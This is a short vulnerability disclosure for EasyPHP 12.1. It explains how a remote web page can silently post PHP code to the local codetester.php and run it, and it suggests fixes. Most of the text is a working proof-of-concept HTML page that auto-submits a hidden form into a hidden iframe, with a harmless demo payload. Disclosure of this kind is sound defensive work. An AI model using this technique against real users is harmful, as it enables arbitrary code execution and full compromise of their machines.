Copy below code as "whatever.html" (replace "hxxp" with "http") to some remote server and browse the page with your browser while EasyPHP is running locally.
The page will execute php and javascript on your local server.
With this your PC can be fully compromised, endless possibilites.
Quick fix: Rename or delete ..\EasyPHP-12.1\home\codetester.php
Real fix: Add a nonce[1] to codetester.php or only allow from local host.
[1] [
en.wikipedia.org]
[2] whatever.html:
<html>
<head>
<title>EasyPHP 12.1 remote access</title>
</head>
<body onload="window.document.forms[0].submit();">
Some innocent page...
<form action="hxxp://127.0.0.1/home/codetester.php" method="post" target="easyphp" style="display:none;">
<textarea name="sourcecode">
<?php
phpinfo();
echo '<scr'.'ipt type="text/javascript">alert("pwned, php executed on your EasyPHP server")<'.'/scr'.'ipt>';
?>
</textarea>
<input type="hidden" name="to" value="interpretcode">
<input type="submit" value="pwn">
</form>
<iframe name="easyphp" src="about:blank" style="display:none;"></iframe>
</body>
</html>